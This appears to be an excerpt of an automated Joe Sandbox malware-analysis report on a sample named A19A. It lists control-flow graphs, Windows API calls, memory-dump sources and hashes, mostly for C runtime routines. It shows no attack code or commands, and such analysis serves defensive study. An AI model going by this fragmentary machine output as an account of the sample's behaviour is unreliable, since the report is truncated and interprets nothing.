17469 7ff6e1b34f71 17467->17469 17470 7ff6e1b34e47 17468->17470 17469->15354 17471 7ff6e1b34e4e 17470->17471 17472 7ff6e1b34e73 17470->17472 17473 7ff6e1b32770 59 API calls 17471->17473 17474 7ff6e1b37a60 57 API calls 17472->17474 17480->17467 17481 7ff6e1b34f5a 17480->17481 17481->15354 17483 7ff6e1b34717 17482->17483 17483->17483 17484 7ff6e1b34740 17483->17484 17491 7ff6e1b34757 __std_exception_destroy 17483->17491 17512 7ff6e1b33c6a 17511->17512 17513 7ff6e1b37a60 57 API calls 17512->17513 17514 7ff6e1b33c92 17513->17514 17515 7ff6e1b3adb0 _wfindfirst32i64 8 API calls 17514->17515 17516 7ff6e1b33cba 17515->17516 17516->17433 17516->17452 17518 7ff6e1b33e38 17517->17518 17519 7ff6e1b33e5b GetProcAddress 17517->17519 17521 7ff6e1b32620 57 API calls 17518->17521 17519->17518 17520 7ff6e1b33e80 GetProcAddress 17519->17520 17520->17518 17522 7ff6e1b33ea5 GetProcAddress 17520->17522 17523 7ff6e1b33e4b 17521->17523 17522->17518 17524 7ff6e1b33ecd GetProcAddress 17522->17524 17523->17453 17524->17518 17525 7ff6e1b33ef5 GetProcAddress 17524->17525 17525->17518 17526 7ff6e1b33f1d GetProcAddress 17525->17526 17527 7ff6e1b33f39 17526->17527 17528 7ff6e1b33f45 GetProcAddress 17526->17528 17527->17528 17529 7ff6e1b33f6d GetProcAddress 17528->17529 17530 7ff6e1b33f61 17528->17530 17530->17529 17792 7ff6e1b4a650 _CallSETranslator 45 API calls 17791->17792 17794 7ff6e1b49111 17792->17794 17793 7ff6e1b4923c _CallSETranslator 45 API calls 17795 7ff6e1b49131 17793->17795 17794->17793 17801 7ff6e1b3a650 17802 7ff6e1b3a673 17801->17802 17803 7ff6e1b3a68f memcpy_s 17801->17803 17804 7ff6e1b4cafc 12 API calls 17802->17804 17804->17803 18099 7ff6e1b4a4d0 18100 7ff6e1b4a4d5 18099->18100 18101 7ff6e1b4a4ea 18099->18101 18105 7ff6e1b4a4f0 18100->18105 18106 7ff6e1b4a532 18105->18106 18107 7ff6e1b4a53a 18105->18107 18108 7ff6e1b49e48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18106->18108 18109 7ff6e1b49e48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18107->18109 18108->18107 18110 7ff6e1b4a547 18109->18110 18111 7ff6e1b49e48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18110->18111 18112 7ff6e1b4a554 18111->18112 18113 7ff6e1b49e48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18112->18113 18114 7ff6e1b4a561 18113->18114 18115 7ff6e1b49e48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18114->18115 18116 7ff6e1b4a56e 18115->18116 18117 7ff6e1b49e48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18116->18117 18118 7ff6e1b4a57b 18117->18118 18119 7ff6e1b49e48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18118->18119 18120 7ff6e1b4a588 18119->18120 18121 7ff6e1b49e48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18120->18121 18122 7ff6e1b4a595 18121->18122 18123 7ff6e1b49e48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18122->18123 18124 7ff6e1b4a5a5 18123->18124 18125 7ff6e1b49e48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18124->18125 18126 7ff6e1b4a5b5 18125->18126 18131 7ff6e1b4a394 18126->18131 18145 7ff6e1b4f7b8 EnterCriticalSection 18131->18145 18147 7ff6e1b505d0 18165 7ff6e1b4f7b8 EnterCriticalSection 18147->18165 18167 7ff6e1b56fd0 18170 7ff6e1b51760 18167->18170 18171 7ff6e1b5176d 18170->18171 18172 7ff6e1b517b2 18170->18172 18176 7ff6e1b4a724 18171->18176 18177 7ff6e1b4a735 FlsGetValue 18176->18177 18178 7ff6e1b4a750 FlsSetValue 18176->18178 18179 7ff6e1b4a74a 18177->18179 18180 7ff6e1b4a742 18177->18180 18178->18180 18181 7ff6e1b4a75d 18178->18181 18179->18178 18182 7ff6e1b4a748 18180->18182 18183 7ff6e1b4923c _CallSETranslator 45 API calls 18180->18183 18184 7ff6e1b4dd70 memcpy_s 11 API calls 18181->18184 18196 7ff6e1b51434 18182->18196 18185 7ff6e1b4a7c5 18183->18185 18186 7ff6e1b4a76c 18184->18186 18187 7ff6e1b4a78a FlsSetValue 18186->18187 18188 7ff6e1b4a77a FlsSetValue 18186->18188 18190 7ff6e1b4a796 FlsSetValue 18187->18190 18191 7ff6e1b4a7a8 18187->18191 18189 7ff6e1b4a783 18188->18189 18193 7ff6e1b49e48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18189->18193 18190->18189 18192 7ff6e1b4a3f4 memcpy_s 11 API calls 18191->18192 18194 7ff6e1b4a7b0 18192->18194 18193->18180 18195 7ff6e1b49e48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18194->18195 18195->18182 18219 7ff6e1b516a4 18196->18219 18198 7ff6e1b51469 18234 7ff6e1b51134 18198->18234 18201 7ff6e1b51486 18201->18172 18202 7ff6e1b4cafc _fread_nolock 12 API calls 18203 7ff6e1b51497 18202->18203 18204 7ff6e1b5149f 18203->18204 18206 7ff6e1b514ae 18203->18206 18205 7ff6e1b49e48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18204->18205 18205->18201 18206->18206 18241 7ff6e1b517dc 18206->18241 18209 7ff6e1b515aa 18210 7ff6e1b44474 memcpy_s 11 API calls 18209->18210 18211 7ff6e1b515af 18210->18211 18214 7ff6e1b49e48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18211->18214 18212 7ff6e1b51605 18213 7ff6e1b5166c 18212->18213 18252 7ff6e1b50f64 18212->18252 18217 7ff6e1b49e48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18213->18217 18214->18201 18215 7ff6e1b515c4 18215->18212 18218 7ff6e1b49e48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18215->18218 18217->18201 18218->18212 18220 7ff6e1b516c7 18219->18220 18221 7ff6e1b516d1 18220->18221 18267 7ff6e1b4f7b8 EnterCriticalSection 18220->18267 18223 7ff6e1b51743 18221->18223 18226 7ff6e1b4923c _CallSETranslator 45 API calls 18221->18226 18223->18198 18229 7ff6e1b5175b 18226->18229 18230 7ff6e1b517b2 18229->18230 18231 7ff6e1b4a724 50 API calls 18229->18231 18230->18198 18232 7ff6e1b5179c 18231->18232 18233 7ff6e1b51434 65 API calls 18232->18233 18233->18230 18235 7ff6e1b44a4c 45 API calls 18234->18235 18236 7ff6e1b51148 18235->18236 18237 7ff6e1b51166 18236->18237 18238 7ff6e1b51154 GetOEMCP 18236->18238 18239 7ff6e1b5117b 18237->18239 18240 7ff6e1b5116b GetACP 18237->18240 18238->18239 18239->18201 18239->18202 18240->18239 18242 7ff6e1b51134 47 API calls 18241->18242 18243 7ff6e1b51809 18242->18243 18244 7ff6e1b5195f 18243->18244 18245 7ff6e1b51846 IsValidCodePage 18243->18245 18251 7ff6e1b51860 memcpy_s 18243->18251 18246 7ff6e1b3adb0 _wfindfirst32i64 8 API calls 18244->18246 18245->18244 18247 7ff6e1b51857 18245->18247 18248 7ff6e1b515a1 18246->18248 18249 7ff6e1b51886 GetCPInfo 18247->18249 18247->18251 18248->18209 18248->18215 18249->18244 18249->18251 18268 7ff6e1b5124c 18251->18268 18339 7ff6e1b4f7b8 EnterCriticalSection 18252->18339 18269 7ff6e1b51289 GetCPInfo 18268->18269 18270 7ff6e1b5137f 18268->18270 18269->18270 18271 7ff6e1b5129c 18269->18271 18272 7ff6e1b3adb0 _wfindfirst32i64 8 API calls 18270->18272 18279 7ff6e1b51f90 18271->18279 18273 7ff6e1b5141e 18272->18273 18273->18244 18278 7ff6e1b56f34 54 API calls 18278->18270 18280 7ff6e1b44a4c 45 API calls 18279->18280 18281 7ff6e1b51fd2 18280->18281 18282 7ff6e1b4e820 _fread_nolock MultiByteToWideChar 18281->18282 18284 7ff6e1b52008 18282->18284 18283 7ff6e1b5200f 18285 7ff6e1b3adb0 _wfindfirst32i64 8 API calls 18283->18285 18284->18283 18286 7ff6e1b4cafc _fread_nolock 12 API calls 18284->18286 18288 7ff6e1b520cc 18284->18288 18290 7ff6e1b52038 memcpy_s 18284->18290 18287 7ff6e1b51313 18285->18287 18286->18290 18294 7ff6e1b56f34 18287->18294 18288->18283 18289 7ff6e1b49e48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18288->18289 18289->18283 18290->18288 18291 7ff6e1b4e820 _fread_nolock MultiByteToWideChar 18290->18291 18292 7ff6e1b520ae 18291->18292 18292->18288 18293 7ff6e1b520b2 GetStringTypeW 18292->18293 18293->18288 18295 7ff6e1b44a4c 45 API calls 18294->18295 18296 7ff6e1b56f59 18295->18296 18299 7ff6e1b56c00 18296->18299 18300 7ff6e1b56c41 18299->18300 18301 7ff6e1b4e820 _fread_nolock MultiByteToWideChar 18300->18301 18305 7ff6e1b56c8b 18301->18305 18302 7ff6e1b56f09 18304 7ff6e1b3adb0 _wfindfirst32i64 8 API calls 18302->18304 18303 7ff6e1b56dc1 18303->18302 18308 7ff6e1b49e48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18303->18308 18306 7ff6e1b51346 18304->18306 18305->18302 18305->18303 18307 7ff6e1b4cafc _fread_nolock 12 API calls 18305->18307 18309 7ff6e1b56cc3 18305->18309 18306->18278 18307->18309 18308->18302 18309->18303 18310 7ff6e1b4e820 _fread_nolock MultiByteToWideChar 18309->18310 18311 7ff6e1b56d36 18310->18311 18311->18303 18330 7ff6e1b4e1bc 18311->18330 18314 7ff6e1b56dd2 18316 7ff6e1b4cafc _fread_nolock 12 API calls 18314->18316 18318 7ff6e1b56df0 18314->18318 18327 7ff6e1b56ea4 18314->18327 18315 7ff6e1b56d81 18315->18303 18317 7ff6e1b4e1bc __crtLCMapStringW 6 API calls 18315->18317 18316->18318 18317->18303 18318->18303 18320 7ff6e1b4e1bc __crtLCMapStringW 6 API calls 18318->18320 18319 7ff6e1b49e48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18319->18303 18321 7ff6e1b56e70 18320->18321 18322 7ff6e1b56ea6 18321->18322 18323 7ff6e1b56e90 18321->18323 18321->18327 18325 7ff6e1b4f0e8 WideCharToMultiByte 18322->18325 18324 7ff6e1b4f0e8 WideCharToMultiByte 18323->18324 18326 7ff6e1b56e9e 18324->18326 18325->18326 18326->18327 18328 7ff6e1b56ebe 18326->18328 18327->18303 18327->18319 18328->18303 18329 7ff6e1b49e48 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18328->18329 18329->18303 18331 7ff6e1b4dde8 __crtLCMapStringW 5 API calls 18330->18331 18332 7ff6e1b4e1fa 18331->18332 18333 7ff6e1b4e202 18332->18333 18336 7ff6e1b4e2a8 18332->18336 18333->18303 18333->18314 18333->18315 18335 7ff6e1b4e26b LCMapStringW 18335->18333 18337 7ff6e1b4dde8 __crtLCMapStringW 5 API calls 18336->18337 18338 7ff6e1b4e2d6 __crtLCMapStringW 18337->18338 18338->18335

                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                  control_flow_graph 135 7ff6e1b54e50-7ff6e1b54e8b call 7ff6e1b547d8 call 7ff6e1b547e0 call 7ff6e1b54848 142 7ff6e1b550b5-7ff6e1b55101 call 7ff6e1b49e00 call 7ff6e1b547d8 call 7ff6e1b547e0 call 7ff6e1b54848 135->142 143 7ff6e1b54e91-7ff6e1b54e9c call 7ff6e1b547e8 135->143 169 7ff6e1b55107-7ff6e1b55112 call 7ff6e1b547e8 142->169 170 7ff6e1b5523f-7ff6e1b552ad call 7ff6e1b49e00 call 7ff6e1b506e8 142->170 143->142 148 7ff6e1b54ea2-7ff6e1b54eac 143->148 150 7ff6e1b54ece-7ff6e1b54ed2 148->150 151 7ff6e1b54eae-7ff6e1b54eb1 148->151 154 7ff6e1b54ed5-7ff6e1b54edd 150->154 153 7ff6e1b54eb4-7ff6e1b54ebf 151->153 156 7ff6e1b54eca-7ff6e1b54ecc 153->156 157 7ff6e1b54ec1-7ff6e1b54ec8 153->157 154->154 158 7ff6e1b54edf-7ff6e1b54ef2 call 7ff6e1b4cafc 154->158 156->150 160 7ff6e1b54efb-7ff6e1b54f09 156->160 157->153 157->156 166 7ff6e1b54f0a-7ff6e1b54f16 call 7ff6e1b49e48 158->166 167 7ff6e1b54ef4-7ff6e1b54ef6 call 7ff6e1b49e48 158->167 176 7ff6e1b54f1d-7ff6e1b54f25 166->176 167->160 169->170 178 7ff6e1b55118-7ff6e1b55123 call 7ff6e1b54818 169->178 188 7ff6e1b552bb-7ff6e1b552be 170->188 189 7ff6e1b552af-7ff6e1b552b6 170->189 176->176 179 7ff6e1b54f27-7ff6e1b54f38 call 7ff6e1b4f954 176->179 178->170 187 7ff6e1b55129-7ff6e1b5514c call 7ff6e1b49e48 GetTimeZoneInformation 178->187 179->142 190 7ff6e1b54f3e-7ff6e1b54f94 call 7ff6e1b3c240 * 4 call 7ff6e1b54d6c 179->190 203 7ff6e1b55152-7ff6e1b55173 187->203 204 7ff6e1b55214-7ff6e1b5523e call 7ff6e1b547d0 call 7ff6e1b547c0 call 7ff6e1b547c8 187->204 193 7ff6e1b552f5-7ff6e1b55308 call 7ff6e1b4cafc 188->193 194 7ff6e1b552c0 188->194 192 7ff6e1b5534b-7ff6e1b5534e 189->192 247 7ff6e1b54f96-7ff6e1b54f9a 190->247 196 7ff6e1b552c3 call 7ff6e1b550cc 192->196 197 7ff6e1b55354-7ff6e1b5535c call 7ff6e1b54e50 192->197 208 7ff6e1b5530a 193->208 209 7ff6e1b55313-7ff6e1b5532e call 7ff6e1b506e8 193->209 194->196 212 7ff6e1b552c8-7ff6e1b552f4 call 7ff6e1b49e48 call 7ff6e1b3adb0 196->212 197->212 210 7ff6e1b55175-7ff6e1b5517b 203->210 211 7ff6e1b5517e-7ff6e1b55185 203->211 216 7ff6e1b5530c-7ff6e1b55311 call 7ff6e1b49e48 208->216 234 7ff6e1b55335-7ff6e1b55347 call 7ff6e1b49e48 209->234 235 7ff6e1b55330-7ff6e1b55333 209->235 210->211 218 7ff6e1b55187-7ff6e1b5518f 211->218 219 7ff6e1b55199 211->219 216->194 218->219 226 7ff6e1b55191-7ff6e1b55197 218->226 222 7ff6e1b5519b-7ff6e1b5520f call 7ff6e1b3c240 * 4 call 7ff6e1b51cac call 7ff6e1b55364 * 2 219->222 222->204 226->222 234->192 235->216 249 7ff6e1b54f9c 247->249 250 7ff6e1b54fa0-7ff6e1b54fa4 247->250 249->250 250->247 252 7ff6e1b54fa6-7ff6e1b54fcb call 7ff6e1b57c94 250->252 258 7ff6e1b54fce-7ff6e1b54fd2 252->258 260 7ff6e1b54fd4-7ff6e1b54fdf 258->260 261 7ff6e1b54fe1-7ff6e1b54fe5 258->261 260->261 263 7ff6e1b54fe7-7ff6e1b54feb 260->263 261->258 266 7ff6e1b5506c-7ff6e1b55070 263->266 267 7ff6e1b54fed-7ff6e1b55015 call 7ff6e1b57c94 263->267 268 7ff6e1b55077-7ff6e1b55084 266->268 269 7ff6e1b55072-7ff6e1b55074 266->269 274 7ff6e1b55017 267->274 275 7ff6e1b55033-7ff6e1b55037 267->275 272 7ff6e1b55086-7ff6e1b5509c call 7ff6e1b54d6c 268->272 273 7ff6e1b5509f-7ff6e1b550ae call 7ff6e1b547d0 call 7ff6e1b547c0 268->273 269->268 272->273 273->142 279 7ff6e1b5501a-7ff6e1b55021 274->279 275->266 281 7ff6e1b55039-7ff6e1b55057 call 7ff6e1b57c94 275->281 279->275 282 7ff6e1b55023-7ff6e1b55031 279->282 287 7ff6e1b55063-7ff6e1b5506a 281->287 282->275 282->279 287->266 288 7ff6e1b55059-7ff6e1b5505d 287->288 288->266 289 7ff6e1b5505f 288->289 289->287
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • _get_daylight.LIBCMT ref: 00007FF6E1B54E95
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00007FF6E1B547E8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6E1B547FC
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00007FF6E1B49E48: RtlRestoreThreadPreferredUILanguages.NTDLL(?,?,?,00007FF6E1B51E72,?,?,?,00007FF6E1B51EAF,?,?,00000000,00007FF6E1B52375,?,?,?,00007FF6E1B522A7), ref: 00007FF6E1B49E5E
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00007FF6E1B49E48: GetLastError.KERNEL32(?,?,?,00007FF6E1B51E72,?,?,?,00007FF6E1B51EAF,?,?,00000000,00007FF6E1B52375,?,?,?,00007FF6E1B522A7), ref: 00007FF6E1B49E68
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00007FF6E1B49E00: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF6E1B49DDF,?,?,?,?,?,00007FF6E1B4221C), ref: 00007FF6E1B49E09
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00007FF6E1B49E00: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF6E1B49DDF,?,?,?,?,?,00007FF6E1B4221C), ref: 00007FF6E1B49E2E
                                                                                                                                                                                                                                                                                                                                  • _get_daylight.LIBCMT ref: 00007FF6E1B54E84
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00007FF6E1B54848: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6E1B5485C
                                                                                                                                                                                                                                                                                                                                  • _get_daylight.LIBCMT ref: 00007FF6E1B550FA
                                                                                                                                                                                                                                                                                                                                  • _get_daylight.LIBCMT ref: 00007FF6E1B5510B
                                                                                                                                                                                                                                                                                                                                  • _get_daylight.LIBCMT ref: 00007FF6E1B5511C
                                                                                                                                                                                                                                                                                                                                  • GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF6E1B5535C), ref: 00007FF6E1B55143
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.4118984545.00007FF6E1B31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6E1B30000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4118707378.00007FF6E1B30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119241171.00007FF6E1B5A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B6D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B7C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B7E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B94000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BBE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BC7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BCB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BD5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff6e1b30000_A19A.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureInformationLanguagesLastPreferredPresentProcessProcessorRestoreThreadTimeZone
                                                                                                                                                                                                                                                                                                                                  • String ID: W. Europe Standard Time$W. Europe Summer Time
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1458651798-690618308
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: d0b24d2932c4ad6ce00caff4c74da18a926a82f58135b852f5126ac34a18b219
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 3f6adc511045c49bbb62267d2fc85843c31b1f77d09551d7dfa6e3b898932531
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d0b24d2932c4ad6ce00caff4c74da18a926a82f58135b852f5126ac34a18b219
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DCD10567A1824246E720DF25D4403BA3762FF46794F446136EA0DC76C5EF3EE442E74A
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                  control_flow_graph 320 7ff6e1b55d9c-7ff6e1b55e0f call 7ff6e1b55ad0 323 7ff6e1b55e29-7ff6e1b55e33 call 7ff6e1b46d2c 320->323 324 7ff6e1b55e11-7ff6e1b55e1a call 7ff6e1b44454 320->324 329 7ff6e1b55e35-7ff6e1b55e4c call 7ff6e1b44454 call 7ff6e1b44474 323->329 330 7ff6e1b55e4e-7ff6e1b55eb7 CreateFileW 323->330 331 7ff6e1b55e1d-7ff6e1b55e24 call 7ff6e1b44474 324->331 329->331 333 7ff6e1b55eb9-7ff6e1b55ebf 330->333 334 7ff6e1b55f34-7ff6e1b55f3f GetFileType 330->334 342 7ff6e1b5616a-7ff6e1b5618a 331->342 340 7ff6e1b55f01-7ff6e1b55f2f GetLastError call 7ff6e1b443e8 333->340 341 7ff6e1b55ec1-7ff6e1b55ec5 333->341 337 7ff6e1b55f92-7ff6e1b55f99 334->337 338 7ff6e1b55f41-7ff6e1b55f7c GetLastError call 7ff6e1b443e8 CloseHandle 334->338 345 7ff6e1b55f9b-7ff6e1b55f9f 337->345 346 7ff6e1b55fa1-7ff6e1b55fa4 337->346 338->331 354 7ff6e1b55f82-7ff6e1b55f8d call 7ff6e1b44474 338->354 340->331 341->340 347 7ff6e1b55ec7-7ff6e1b55eff CreateFileW 341->347 351 7ff6e1b55faa-7ff6e1b55fff call 7ff6e1b46c44 345->351 346->351 352 7ff6e1b55fa6 346->352 347->334 347->340 359 7ff6e1b5601e-7ff6e1b5604f call 7ff6e1b55850 351->359 360 7ff6e1b56001-7ff6e1b5600d call 7ff6e1b55cd8 351->360 352->351 354->331 366 7ff6e1b56055-7ff6e1b56097 359->366 367 7ff6e1b56051-7ff6e1b56053 359->367 360->359 365 7ff6e1b5600f 360->365 368 7ff6e1b56011-7ff6e1b56019 call 7ff6e1b49fc0 365->368 369 7ff6e1b560b9-7ff6e1b560c4 366->369 370 7ff6e1b56099-7ff6e1b5609d 366->370 367->368 368->342 373 7ff6e1b560ca-7ff6e1b560ce 369->373 374 7ff6e1b56168 369->374 370->369 372 7ff6e1b5609f-7ff6e1b560b4 370->372 372->369 373->374 376 7ff6e1b560d4-7ff6e1b56119 CloseHandle CreateFileW 373->376 374->342 377 7ff6e1b5611b-7ff6e1b56149 GetLastError call 7ff6e1b443e8 call 7ff6e1b46e6c 376->377 378 7ff6e1b5614e-7ff6e1b56163 376->378 377->378 378->374
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.4118984545.00007FF6E1B31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6E1B30000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4118707378.00007FF6E1B30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119241171.00007FF6E1B5A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B6D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B7C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B7E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B94000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BBE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BC7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BCB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BD5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff6e1b30000_A19A.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1617910340-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 4c9dcb694f9da37b9569774e6528ce897b09f0f884fc50d365155145b1bc53bc
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 3ff144472b6e8b991e8a432e02cfe8f4cca96f5ae548b04fd05e974951c15b11
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4c9dcb694f9da37b9569774e6528ce897b09f0f884fc50d365155145b1bc53bc
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F4C1E137B28A4285EB10CF65C4806BD3772FB4AB98B016235DE2E9B795DF3AD052D305
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • GetTempPathW.KERNEL32(?,?,00000000,?,?,00007FF6E1B3676D), ref: 00007FF6E1B36837
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00007FF6E1B369B0: GetEnvironmentVariableW.KERNEL32(00007FF6E1B33707), ref: 00007FF6E1B369EA
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00007FF6E1B369B0: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF6E1B36A07
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00007FF6E1B466E4: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6E1B466FD
                                                                                                                                                                                                                                                                                                                                  • SetEnvironmentVariableW.KERNEL32(?,?,00000000,?,?,00007FF6E1B3676D), ref: 00007FF6E1B368F1
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00007FF6E1B32770: MessageBoxW.USER32 ref: 00007FF6E1B32845
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.4118984545.00007FF6E1B31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6E1B30000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4118707378.00007FF6E1B30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119241171.00007FF6E1B5A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B6D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B7C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B7E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B94000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BBE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BC7000.00000002.00000001.01000000.00000008.sdmpDownload File
